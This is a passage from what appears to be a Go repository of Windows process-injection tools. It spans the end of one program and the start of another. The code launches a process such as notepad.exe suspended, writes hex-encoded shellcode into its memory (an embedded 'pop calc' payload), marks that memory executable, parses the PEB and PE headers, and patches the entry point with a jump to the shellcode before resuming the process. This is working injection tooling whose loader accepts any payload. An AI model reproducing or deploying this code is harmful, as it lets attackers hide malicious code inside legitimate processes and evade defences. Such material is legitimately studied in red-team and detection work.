NtQueryInformationProcess:\r\n\t%s", syscall.Errno(ntStatus))) 193 | } 194 | if *verbose { 195 | fmt.Println("[-]Got PEB info from NtQueryInformationProcess") 196 | } 197 | 198 | // Read from PEB base address to populate the PEB structure 199 | // ReadProcessMemory 200 | /* 201 | BOOL ReadProcessMemory( 202 | HANDLE hProcess, 203 | LPCVOID lpBaseAddress, 204 | LPVOID lpBuffer, 205 | SIZE_T nSize, 206 | SIZE_T *lpNumberOfBytesRead 207 | ); 208 | */ 209 | 210 | ReadProcessMemory := kernel32.NewProc("ReadProcessMemory") 211 | 212 | if *debug { 213 | fmt.Println("[DEBUG]Calling ReadProcessMemory for PEB...") 214 | } 215 | 216 | var peb PEB 217 | var readBytes int32 218 | 219 | _, _, errReadProcessMemory := ReadProcessMemory.Call(uintptr(procInfo.Process), processInformation.PebBaseAddress, uintptr(unsafe.Pointer(&peb)), unsafe.Sizeof(peb), uintptr(unsafe.Pointer(&readBytes))) 220 | if errReadProcessMemory != nil && errReadProcessMemory.Error() != "The operation completed successfully." { 221 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory.Error())) 222 | } 223 | if *verbose { 224 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for PEB", readBytes)) 225 | } 226 | if *debug { 227 | fmt.Println(fmt.Sprintf("[DEBUG]PEB: %+v", peb)) 228 | fmt.Println(fmt.Sprintf("[DEBUG]PEB ImageBaseAddress: 0x%x", peb.ImageBaseAddress)) 229 | } 230 | 231 | // Read the child program's DOS header and validate it is a MZ executable 232 | type IMAGE_DOS_HEADER struct { 233 | Magic uint16 // USHORT Magic number 234 | Cblp uint16 // USHORT Bytes on last page of file 235 | Cp uint16 // USHORT Pages in file 236 | Crlc uint16 // USHORT Relocations 237 | Cparhdr uint16 // USHORT Size of header in paragraphs 238 | MinAlloc uint16 // USHORT Minimum extra paragraphs needed 239 | MaxAlloc uint16 // USHORT Maximum extra paragraphs needed 240 | SS uint16 // USHORT Initial (relative) SS value 241 | SP uint16 // USHORT Initial SP value 242 | CSum uint16 // USHORT Checksum 243 | IP uint16 // USHORT Initial IP value 244 | CS uint16 // USHORT Initial (relative) CS value 245 | LfaRlc uint16 // USHORT File address of relocation table 246 | Ovno uint16 // USHORT Overlay number 247 | Res [4]uint16 // USHORT Reserved words 248 | OEMID uint16 // USHORT OEM identifier (for e_oeminfo) 249 | OEMInfo uint16 // USHORT OEM information; e_oemid specific 250 | Res2 [10]uint16 // USHORT Reserved words 251 | LfaNew int32 // LONG File address of new exe header 252 | } 253 | 254 | if *debug { 255 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_DOS_HEADER...") 256 | } 257 | 258 | var dosHeader IMAGE_DOS_HEADER 259 | var readBytes2 int32 260 | 261 | _, _, errReadProcessMemory2 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress, uintptr(unsafe.Pointer(&dosHeader)), unsafe.Sizeof(dosHeader), uintptr(unsafe.Pointer(&readBytes2))) 262 | if errReadProcessMemory2 != nil && errReadProcessMemory2.Error() != "The operation completed successfully." { 263 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory2.Error())) 264 | } 265 | if *verbose { 266 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_DOS_HEADER", readBytes2)) 267 | } 268 | if *debug { 269 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_DOS_HEADER: %+v", dosHeader)) 270 | fmt.Println(fmt.Sprintf("[DEBUG]Magic: %s", string(dosHeader.Magic&0xff)+string(dosHeader.Magic>>8))) // LittleEndian 271 | fmt.Println(fmt.Sprintf("[DEBUG]PE header offset: 0x%x", dosHeader.LfaNew)) 272 | } 273 | 274 | // 23117 is the LittleEndian unsigned base10 representation of MZ 275 | // 0x5a4d is the LittleEndian unsigned base16 represenation of MZ 276 | if dosHeader.Magic != 23117 { 277 | log.Fatal(fmt.Sprintf("[!]DOS image header magic string was not MZ")) 278 | } 279 | 280 | // Read the child process's PE header signature to validate it is a PE 281 | if *debug { 282 | fmt.Println("[DEBUG]Calling ReadProcessMemory for PE Signature...") 283 | } 284 | var Signature uint32 285 | var readBytes3 int32 286 | 287 | _, _, errReadProcessMemory3 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew), uintptr(unsafe.Pointer(&Signature)), unsafe.Sizeof(Signature), uintptr(unsafe.Pointer(&readBytes3))) 288 | if errReadProcessMemory3 != nil && errReadProcessMemory3.Error() != "The operation completed successfully." { 289 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory3.Error())) 290 | } 291 | if *verbose { 292 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for PE Signature", readBytes3)) 293 | 294 | } 295 | if *debug { 296 | fmt.Println(fmt.Sprintf("[DEUBG]PE Signature: 0x%x", Signature)) 297 | } 298 | 299 | // 17744 is Little Endian Unsigned 32-bit integer in decimal for PE (null terminated) 300 | // 0x4550 is Little Endian Unsigned 32-bit integer in hex for PE (null terminated) 301 | if Signature != 17744 { 302 | log.Fatal("[!]PE Signature string was not PE") 303 | } 304 | 305 | // Read the child process's PE file header 306 | /* 307 | typedef struct _IMAGE_FILE_HEADER { 308 | USHORT Machine; 309 | USHORT NumberOfSections; 310 | ULONG TimeDateStamp; 311 | ULONG PointerToSymbolTable; 312 | ULONG NumberOfSymbols; 313 | USHORT SizeOfOptionalHeader; 314 | USHORT Characteristics; 315 | } IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER; 316 | */ 317 | 318 | type IMAGE_FILE_HEADER struct { 319 | Machine uint16 320 | NumberOfSections uint16 321 | TimeDateStamp uint32 322 | PointerToSymbolTable uint32 323 | NumberOfSymbols uint32 324 | SizeOfOptionalHeader uint16 325 | Characteristics uint16 326 | } 327 | 328 | if *debug { 329 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_FILE_HEADER...") 330 | } 331 | var peHeader IMAGE_FILE_HEADER 332 | var readBytes4 int32 333 | 334 | _, _, errReadProcessMemory4 := ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature), uintptr(unsafe.Pointer(&peHeader)), unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&readBytes4))) 335 | if errReadProcessMemory4 != nil && errReadProcessMemory4.Error() != "The operation completed successfully." { 336 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory4.Error())) 337 | } 338 | if *verbose { 339 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_FILE_HEADER", readBytes4)) 340 | switch peHeader.Machine { 341 | case 34404: // 0x8664 342 | fmt.Println("[-]Machine type: IMAGE_FILE_MACHINE_AMD64 (x64)") 343 | case 332: // 0x14c 344 | fmt.Println("[-]Machine type: IMAGE_FILE_MACHINE_I386 (x86)") 345 | default: 346 | fmt.Println(fmt.Sprintf("[-]Machine type UNKOWN: 0x%x", peHeader.Machine)) 347 | } 348 | } 349 | if *debug { 350 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_FILE_HEADER: %+v", peHeader)) 351 | fmt.Println(fmt.Sprintf("[DEBUG]Machine: 0x%x", peHeader.Machine)) 352 | } 353 | 354 | // Read the child process's PE optional header to find it's entry point 355 | /* 356 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header64 357 | typedef struct _IMAGE_OPTIONAL_HEADER64 { 358 | WORD Magic; 359 | BYTE MajorLinkerVersion; 360 | BYTE MinorLinkerVersion; 361 | DWORD SizeOfCode; 362 | DWORD SizeOfInitializedData; 363 | DWORD SizeOfUninitializedData; 364 | DWORD AddressOfEntryPoint; 365 | DWORD BaseOfCode; 366 | ULONGLONG ImageBase; 367 | DWORD SectionAlignment; 368 | DWORD FileAlignment; 369 | WORD MajorOperatingSystemVersion; 370 | WORD MinorOperatingSystemVersion; 371 | WORD MajorImageVersion; 372 | WORD MinorImageVersion; 373 | WORD MajorSubsystemVersion; 374 | WORD MinorSubsystemVersion; 375 | DWORD Win32VersionValue; 376 | DWORD SizeOfImage; 377 | DWORD SizeOfHeaders; 378 | DWORD CheckSum; 379 | WORD Subsystem; 380 | WORD DllCharacteristics; 381 | ULONGLONG SizeOfStackReserve; 382 | ULONGLONG SizeOfStackCommit; 383 | ULONGLONG SizeOfHeapReserve; 384 | ULONGLONG SizeOfHeapCommit; 385 | DWORD LoaderFlags; 386 | DWORD NumberOfRvaAndSizes; 387 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 388 | } IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64; 389 | */ 390 | 391 | type IMAGE_OPTIONAL_HEADER64 struct { 392 | Magic uint16 393 | MajorLinkerVersion byte 394 | MinorLinkerVersion byte 395 | SizeOfCode uint32 396 | SizeOfInitializedData uint32 397 | SizeOfUninitializedData uint32 398 | AddressOfEntryPoint uint32 399 | BaseOfCode uint32 400 | ImageBase uint64 401 | SectionAlignment uint32 402 | FileAlignment uint32 403 | MajorOperatingSystemVersion uint16 404 | MinorOperatingSystemVersion uint16 405 | MajorImageVersion uint16 406 | MinorImageVersion uint16 407 | MajorSubsystemVersion uint16 408 | MinorSubsystemVersion uint16 409 | Win32VersionValue uint32 410 | SizeOfImage uint32 411 | SizeOfHeaders uint32 412 | CheckSum uint32 413 | Subsystem uint16 414 | DllCharacteristics uint16 415 | SizeOfStackReserve uint64 416 | SizeOfStackCommit uint64 417 | SizeOfHeapReserve uint64 418 | SizeOfHeapCommit uint64 419 | LoaderFlags uint32 420 | NumberOfRvaAndSizes uint32 421 | DataDirectory uintptr 422 | } 423 | 424 | /* 425 | https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-image_optional_header32 426 | typedef struct _IMAGE_OPTIONAL_HEADER { 427 | WORD Magic; 428 | BYTE MajorLinkerVersion; 429 | BYTE MinorLinkerVersion; 430 | DWORD SizeOfCode; 431 | DWORD SizeOfInitializedData; 432 | DWORD SizeOfUninitializedData; 433 | DWORD AddressOfEntryPoint; 434 | DWORD BaseOfCode; 435 | DWORD BaseOfData; 436 | DWORD ImageBase; 437 | DWORD SectionAlignment; 438 | DWORD FileAlignment; 439 | WORD MajorOperatingSystemVersion; 440 | WORD MinorOperatingSystemVersion; 441 | WORD MajorImageVersion; 442 | WORD MinorImageVersion; 443 | WORD MajorSubsystemVersion; 444 | WORD MinorSubsystemVersion; 445 | DWORD Win32VersionValue; 446 | DWORD SizeOfImage; 447 | DWORD SizeOfHeaders; 448 | DWORD CheckSum; 449 | WORD Subsystem; 450 | WORD DllCharacteristics; 451 | DWORD SizeOfStackReserve; 452 | DWORD SizeOfStackCommit; 453 | DWORD SizeOfHeapReserve; 454 | DWORD SizeOfHeapCommit; 455 | DWORD LoaderFlags; 456 | DWORD NumberOfRvaAndSizes; 457 | IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; 458 | } IMAGE_OPTIONAL_HEADER32, *PIMAGE_OPTIONAL_HEADER32; 459 | */ 460 | 461 | type IMAGE_OPTIONAL_HEADER32 struct { 462 | Magic uint16 463 | MajorLinkerVersion byte 464 | MinorLinkerVersion byte 465 | SizeOfCode uint32 466 | SizeOfInitializedData uint32 467 | SizeOfUninitializedData uint32 468 | AddressOfEntryPoint uint32 469 | BaseOfCode uint32 470 | BaseOfData uint32 // Different from 64 bit header 471 | ImageBase uint64 472 | SectionAlignment uint32 473 | FileAlignment uint32 474 | MajorOperatingSystemVersion uint16 475 | MinorOperatingSystemVersion uint16 476 | MajorImageVersion uint16 477 | MinorImageVersion uint16 478 | MajorSubsystemVersion uint16 479 | MinorSubsystemVersion uint16 480 | Win32VersionValue uint32 481 | SizeOfImage uint32 482 | SizeOfHeaders uint32 483 | CheckSum uint32 484 | Subsystem uint16 485 | DllCharacteristics uint16 486 | SizeOfStackReserve uint64 487 | SizeOfStackCommit uint64 488 | SizeOfHeapReserve uint64 489 | SizeOfHeapCommit uint64 490 | LoaderFlags uint32 491 | NumberOfRvaAndSizes uint32 492 | DataDirectory uintptr 493 | } 494 | 495 | if *debug { 496 | fmt.Println("[DEBUG]Calling ReadProcessMemory for IMAGE_OPTIONAL_HEADER...") 497 | } 498 | 499 | var optHeader64 IMAGE_OPTIONAL_HEADER64 500 | var optHeader32 IMAGE_OPTIONAL_HEADER32 501 | var errReadProcessMemory5 error 502 | var readBytes5 int32 503 | 504 | if peHeader.Machine == 34404 { // 0x8664 505 | _, _, errReadProcessMemory5 = ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature)+unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&optHeader64)), unsafe.Sizeof(optHeader64), uintptr(unsafe.Pointer(&readBytes5))) 506 | } else if peHeader.Machine == 332 { // 0x14c 507 | _, _, errReadProcessMemory5 = ReadProcessMemory.Call(uintptr(procInfo.Process), peb.ImageBaseAddress+uintptr(dosHeader.LfaNew)+unsafe.Sizeof(Signature)+unsafe.Sizeof(peHeader), uintptr(unsafe.Pointer(&optHeader32)), unsafe.Sizeof(optHeader32), uintptr(unsafe.Pointer(&readBytes5))) 508 | } else { 509 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 510 | } 511 | 512 | if errReadProcessMemory5 != nil && errReadProcessMemory5.Error() != "The operation completed successfully." { 513 | log.Fatal(fmt.Sprintf("[!]Error calling ReadProcessMemory:\r\n\t%s", errReadProcessMemory5.Error())) 514 | } 515 | if *verbose { 516 | fmt.Println(fmt.Sprintf("[-]ReadProcessMemory completed reading %d bytes for IMAGE_OPTIONAL_HEADER", readBytes5)) 517 | } 518 | if *debug { 519 | if peHeader.Machine == 332 { // 0x14c 520 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_OPTIONAL_HEADER32: %+v", optHeader32)) 521 | fmt.Println(fmt.Sprintf("\t[DEBUG]ImageBase: 0x%x", optHeader32.ImageBase)) 522 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (relative): 0x%x", optHeader32.AddressOfEntryPoint)) 523 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (absolute): 0x%x", peb.ImageBaseAddress+uintptr(optHeader32.AddressOfEntryPoint))) 524 | } 525 | if peHeader.Machine == 34404 { // 0x8664 526 | fmt.Println(fmt.Sprintf("[DEBUG]IMAGE_OPTIONAL_HEADER64: %+v", optHeader64)) 527 | fmt.Println(fmt.Sprintf("\t[DEBUG]ImageBase: 0x%x", optHeader64.ImageBase)) 528 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (relative): 0x%x", optHeader64.AddressOfEntryPoint)) 529 | fmt.Println(fmt.Sprintf("\t[DEBUG]AddressOfEntryPoint (absolute): 0x%x", peb.ImageBaseAddress+uintptr(optHeader64.AddressOfEntryPoint))) 530 | } 531 | } 532 | 533 | // Overwrite the value at AddressofEntryPoint field with trampoline to load the shellcode address in RAX/EAX and jump to it 534 | var ep uintptr 535 | if peHeader.Machine == 34404 { // 0x8664 x64 536 | ep = peb.ImageBaseAddress + uintptr(optHeader64.AddressOfEntryPoint) 537 | } else if peHeader.Machine == 332 { // 0x14c x86 538 | ep = peb.ImageBaseAddress + uintptr(optHeader32.AddressOfEntryPoint) 539 | } else { 540 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 541 | } 542 | 543 | var epBuffer []byte 544 | var shellcodeAddressBuffer []byte 545 | // x86 - 0xb8 = mov eax 546 | // x64 - 0x48 = rex (declare 64bit); 0xb8 = mov eax 547 | if peHeader.Machine == 34404 { // 0x8664 x64 548 | epBuffer = append(epBuffer, byte(0x48)) 549 | epBuffer = append(epBuffer, byte(0xb8)) 550 | shellcodeAddressBuffer = make([]byte, 8) // 8 bytes for 64-bit address 551 | binary.LittleEndian.PutUint64(shellcodeAddressBuffer, uint64(addr)) 552 | epBuffer = append(epBuffer, shellcodeAddressBuffer...) 553 | } else if peHeader.Machine == 332 { // 0x14c x86 554 | epBuffer = append(epBuffer, byte(0xb8)) 555 | shellcodeAddressBuffer = make([]byte, 4) // 4 bytes for 32-bit address 556 | binary.LittleEndian.PutUint32(shellcodeAddressBuffer, uint32(addr)) 557 | epBuffer = append(epBuffer, shellcodeAddressBuffer...) 558 | } else { 559 | log.Fatal(fmt.Sprintf("[!]Unknow IMAGE_OPTIONAL_HEADER type for machine type: 0x%x", peHeader.Machine)) 560 | } 561 | 562 | // 0xff ; 0xe0 = jmp [r|e]ax 563 | epBuffer = append(epBuffer, byte(0xff)) 564 | epBuffer = append(epBuffer, byte(0xe0)) 565 | 566 | if *debug { 567 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory to overwrite AddressofEntryPoint at 0x%x with trampoline: 0x%x...", ep, epBuffer)) 568 | } 569 | 570 | _, _, errWriteProcessMemory2 := WriteProcessMemory.Call(uintptr(procInfo.Process), ep, uintptr(unsafe.Pointer(&epBuffer[0])), uintptr(len(epBuffer))) 571 | 572 | if errWriteProcessMemory2 != nil && errWriteProcessMemory2.Error() != "The operation completed successfully." { 573 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory2.Error())) 574 | } 575 | if *verbose { 576 | fmt.Println("[-]Successfully overwrote the AddressofEntryPoint") 577 | } 578 | 579 | // Resume the child process 580 | if *debug { 581 | fmt.Println("[DEBUG]Calling ResumeThread...") 582 | } 583 | _, errResumeThread := windows.ResumeThread(procInfo.Thread) 584 | if errResumeThread != nil { 585 | log.Fatal(fmt.Sprintf("[!]Error calling ResumeThread:\r\n%s", errResumeThread.Error())) 586 | } 587 | if *verbose { 588 | fmt.Println("[+]Process resumed and shellcode executed") 589 | } 590 | 591 | // Close the handle to the child process 592 | if *debug { 593 | fmt.Println("[DEBUG]Calling CloseHandle on child process...") 594 | } 595 | errCloseProcHandle := windows.CloseHandle(procInfo.Process) 596 | if errCloseProcHandle != nil { 597 | log.Fatal(fmt.Sprintf("[!]Error closing the child process handle:\r\n\t%s", errCloseProcHandle.Error())) 598 | } 599 | 600 | // Close the hand to the child process thread 601 | if *debug { 602 | fmt.Println("[DEBUG]Calling CloseHandle on child process thread...") 603 | } 604 | errCloseThreadHandle := windows.CloseHandle(procInfo.Thread) 605 | if errCloseThreadHandle != nil { 606 | log.Fatal(fmt.Sprintf("[!]Error closing the child process thread handle:\r\n\t%s", errCloseThreadHandle.Error())) 607 | } 608 | } 609 | 610 | // export GOOS=windows GOARCH=amd64;go build -o goCreateProcess.exe cmd/CreateProcess/main.go 611 | // test STDERR go run .\cmd\CreateProcess\main.go -verbose -debug -program "C:\Windows\System32\cmd.exe" -args "/c whoami /asdfasdf" 612 | -------------------------------------------------------------------------------- /cmd/CreateProcessWithPipe/main.go: -------------------------------------------------------------------------------- 1 | // +build windows 2 | 3 | package main 4 | 5 | import ( 6 | "encoding/binary" 7 | "encoding/hex" 8 | "flag" 9 | "fmt" 10 | "log" 11 | "os" 12 | "syscall" 13 | "unsafe" 14 | 15 | // Sub Repositories 16 | "golang.org/x/sys/windows" 17 | ) 18 | 19 | func main() { 20 | verbose := flag.Bool("verbose", false, "Enable verbose output") 21 | debug := flag.Bool("debug", false, "Enable debug output") 22 | program := flag.String("program", "C:\\Windows\\System32\\notepad.exe", "The program to start and inject shellcode into") 23 | args := flag.String("args", "", "Program command line arguments") 24 | flag.Usage = func() { 25 | flag.PrintDefaults() 26 | os.Exit(0) 27 | } 28 | flag.Parse() 29 | 30 | // Pop Calc Shellcode 31 | shellcode, errShellcode := hex.DecodeString("505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3") 32 | if errShellcode != nil { 33 | log.Fatal(fmt.Sprintf("[!]there was an error decoding the string to a hex byte array: %s", errShellcode.Error())) 34 | } 35 | 36 | if *debug { 37 | fmt.Println("[DEBUG]Loading kernel32.dll and ntdll.dll...") 38 | } 39 | 40 | // Load DLLs and Procedures 41 | kernel32 := windows.NewLazySystemDLL("kernel32.dll") 42 | ntdll := windows.NewLazySystemDLL("ntdll.dll") 43 | 44 | if *debug { 45 | fmt.Println("[DEBUG]Loading supporting procedures...") 46 | } 47 | VirtualAllocEx := kernel32.NewProc("VirtualAllocEx") 48 | VirtualProtectEx := kernel32.NewProc("VirtualProtectEx") 49 | WriteProcessMemory := kernel32.NewProc("WriteProcessMemory") 50 | NtQueryInformationProcess := ntdll.NewProc("NtQueryInformationProcess") 51 | 52 | // Create anonymous pipe for STDIN 53 | // TODO I don't think I need this for anything 54 | var stdInRead windows.Handle 55 | var stdInWrite windows.Handle 56 | 57 | if *debug { 58 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreatePipe for STDIN...")) 59 | } 60 | errStdInPipe := windows.CreatePipe(&stdInRead, &stdInWrite, &windows.SecurityAttributes{InheritHandle: 1}, 0) 61 | if errStdInPipe != nil { 62 | log.Fatal(fmt.Sprintf("[!]Error creating the STDIN pipe:\r\n%s", errStdInPipe.Error())) 63 | } 64 | if *verbose { 65 | fmt.Println(fmt.Sprintf("[-]Successfully created STDIN pipe")) 66 | } 67 | if *debug { 68 | fmt.Println(fmt.Sprintf("[DEBUG]STDIN pipe read handle %v", stdInRead)) 69 | fmt.Println(fmt.Sprintf("[DEBUG]STDIN pipe write handle %v", stdInWrite)) 70 | } 71 | 72 | // Create anonymous pipe for STDOUT 73 | var stdOutRead windows.Handle 74 | var stdOutWrite windows.Handle 75 | if *debug { 76 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreatePipe for STDOUT...")) 77 | } 78 | errStdOutPipe := windows.CreatePipe(&stdOutRead, &stdOutWrite, &windows.SecurityAttributes{InheritHandle: 1}, 0) 79 | if errStdOutPipe != nil { 80 | log.Fatal(fmt.Sprintf("[!]Error creating the STDOUT pipe:\r\n%s", errStdOutPipe.Error())) 81 | } 82 | if *verbose { 83 | fmt.Println(fmt.Sprintf("[-]Successfully created STDOUT pipe")) 84 | } 85 | if *debug { 86 | fmt.Println(fmt.Sprintf("[DEBUG]STDOUT pipe read handle %v", stdOutRead)) 87 | fmt.Println(fmt.Sprintf("[DEBUG]STDOUT pipe write handle %v", stdOutWrite)) 88 | } 89 | 90 | // Create anonymous pipe for STDERR 91 | var stdErrRead windows.Handle 92 | var stdErrWrite windows.Handle 93 | if *debug { 94 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreatePipe for STDERR...")) 95 | } 96 | errStdErrPipe := windows.CreatePipe(&stdErrRead, &stdErrWrite, &windows.SecurityAttributes{InheritHandle: 1}, 0) 97 | if errStdErrPipe != nil { 98 | log.Fatal(fmt.Sprintf("[!]Error creating the STDERR pipe:\r\n%s", errStdErrPipe.Error())) 99 | } 100 | if *verbose { 101 | fmt.Println(fmt.Sprintf("[-]Successfully created STDERR pipe")) 102 | } 103 | if *debug { 104 | fmt.Println(fmt.Sprintf("[DEBUG]STDERR pipe read handle %v", stdErrRead)) 105 | fmt.Println(fmt.Sprintf("[DEBUG]STDOUT pipe write handle %v", stdErrWrite)) 106 | } 107 | 108 | // Create child proccess in suspended state 109 | /* 110 | BOOL CreateProcessW( 111 | LPCWSTR lpApplicationName, 112 | LPWSTR lpCommandLine, 113 | LPSECURITY_ATTRIBUTES lpProcessAttributes, 114 | LPSECURITY_ATTRIBUTES lpThreadAttributes, 115 | BOOL bInheritHandles, 116 | DWORD dwCreationFlags, 117 | LPVOID lpEnvironment, 118 | LPCWSTR lpCurrentDirectory, 119 | LPSTARTUPINFOW lpStartupInfo, 120 | LPPROCESS_INFORMATION lpProcessInformation 121 | ); 122 | */ 123 | 124 | if *debug { 125 | fmt.Println(fmt.Sprintf("[DEBUG]Calling CreateProcess to start:\r\n\t%s %s...", *program, *args)) 126 | } 127 | procInfo := &windows.ProcessInformation{} 128 | startupInfo := &windows.StartupInfo{ 129 | StdInput: stdInRead, 130 | StdOutput: stdOutWrite, 131 | StdErr: stdErrWrite, 132 | Flags: windows.STARTF_USESTDHANDLES | windows.CREATE_SUSPENDED, 133 | ShowWindow: 1, 134 | } 135 | errCreateProcess := windows.CreateProcess(syscall.StringToUTF16Ptr(*program), syscall.StringToUTF16Ptr(*args), nil, nil, true, windows.CREATE_SUSPENDED, nil, nil, startupInfo, procInfo) 136 | if errCreateProcess != nil && errCreateProcess.Error() != "The operation completed successfully." { 137 | log.Fatal(fmt.Sprintf("[!]Error calling CreateProcess:\r\n%s", errCreateProcess.Error())) 138 | } 139 | if *verbose { 140 | fmt.Println(fmt.Sprintf("[-]Successfully created the %s prcoess in PID %d", *program, procInfo.ProcessId)) 141 | } 142 | 143 | // Allocate memory in child process 144 | if *debug { 145 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualAllocEx on PID %d...", procInfo.ProcessId)) 146 | } 147 | addr, _, errVirtualAlloc := VirtualAllocEx.Call(uintptr(procInfo.Process), 0, uintptr(len(shellcode)), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE) 148 | 149 | if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." { 150 | log.Fatal(fmt.Sprintf("[!]Error calling VirtualAlloc:\r\n%s", errVirtualAlloc.Error())) 151 | } 152 | 153 | if addr == 0 { 154 | log.Fatal("[!]VirtualAllocEx failed and returned 0") 155 | } 156 | if *verbose { 157 | fmt.Println(fmt.Sprintf("[-]Successfully allocated memory in PID %d", procInfo.ProcessId)) 158 | } 159 | if *debug { 160 | fmt.Println(fmt.Sprintf("[DEBUG]Shellcode address: 0x%x", addr)) 161 | } 162 | 163 | // Write shellcode into child process memory 164 | if *debug { 165 | fmt.Println(fmt.Sprintf("[DEBUG]Calling WriteProcessMemory on PID %d...", procInfo.ProcessId)) 166 | } 167 | _, _, errWriteProcessMemory := WriteProcessMemory.Call(uintptr(procInfo.Process), addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 168 | 169 | if errWriteProcessMemory != nil && errWriteProcessMemory.Error() != "The operation completed successfully." { 170 | log.Fatal(fmt.Sprintf("[!]Error calling WriteProcessMemory:\r\n%s", errWriteProcessMemory.Error())) 171 | } 172 | if *verbose { 173 | fmt.Println(fmt.Sprintf("[-]Successfully wrote %d shellcode bytes to PID %d", len(shellcode), procInfo.ProcessId)) 174 | } 175 | 176 | // Change memory permissions to RX in child process where shellcode was written 177 | if *debug { 178 | fmt.Println(fmt.Sprintf("[DEBUG]Calling VirtualProtectEx on PID %d...", procInfo.ProcessId)) 179 | } 180 | oldProtect := windows.PAGE_READWRITE 181 | _, _, errVirtualProtectEx := VirtualProtectEx.Call(uintptr(procInfo.Process), addr, uintptr(len(shellcode)), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 182 | if errVirtualProtectEx != nil && errVirtualProtectEx.Error() != "The operation completed successfully." { 183 | log.Fatal(fmt.Sprintf("Error calling VirtualProtectEx:\r\n%s", errVirtualProtectEx.Error())) 184 | } 185 | if *verbose { 186 | fmt.Println(fmt.Sprintf("[-]Successfully changed memory permissions to PAGE_EXECUTE_READ in PID %d", procInfo.ProcessId)) 187 | } 188 | 189 | // Query the child process and find its image base address from its Process Environment Block (PEB) 190 | // https://github.com/winlabs/gowin32/blob/0b6f3bef0b7501b26caaecab8d52b09813224373/wrappers/winternl.go#L37 191 | // http://bytepointer.com/resources/tebpeb32.htm 192 | // https://www.nirsoft.net/kernel_struct/vista/PEB.html 193 | type PEB struct { 194 | //reserved1 [2]byte // BYTE 0-1 195 | InheritedAddressSpace byte // BYTE 0 196 | ReadImageFileExecOptions byte // BYTE 1 197 | BeingDebugged byte // BYTE 2 198 | reserved2 [1]byte // BYTE 3 199 | // ImageUsesLargePages : 1; //0x0003:0 (WS03_SP1+) 200 | // IsProtectedProcess : 1; //0x0003:1 (Vista+) 201 | // IsLegacyProcess : 1; //0x0003:2 (Vista+) 202 | // IsImageDynamicallyRelocated : 1; //0x0003:3 (Vista+) 203 | // SkipPatchingUser32Forwarders : 1; //0x0003:4 (Vista_SP1+) 204 | // IsPackagedProcess : 1; //0x0003:5 (Win8_BETA+) 205 | // IsAppContainer : 1; //0x0003:6 (Win8_RTM+) 206 | // SpareBit : 1; //0x0003:7 207 | //reserved3 [2]uintptr // PVOID BYTE 4-8 208 | Mutant uintptr // BYTE 4 209 | ImageBaseAddress uintptr // BYTE 8 210 | Ldr uintptr // PPEB_LDR_DATA 211 | ProcessParameters uintptr // PRTL_USER_PROCESS_PARAMETERS 212 | reserved4 [3]uintptr // PVOID 213 | AtlThunkSListPtr uintptr // PVOID 214 | reserved5 uintptr // PVOID 215 | reserved6 uint32 // ULONG 216 | reserved7 uintptr // PVOID 217 | reserved8 uint32 // ULONG 218 | AtlThunkSListPtr32 uint32 // ULONG 219 | reserved9 [45]uintptr // PVOID 220 | reserved10 [96]byte // BYTE 221 | PostProcessInitRoutine uintptr // PPS_POST_PROCESS_INIT_ROUTINE 222 | reserved11 [128]byte // BYTE 223 | reserved12 [1]uintptr // PVOID 224 | SessionId uint32 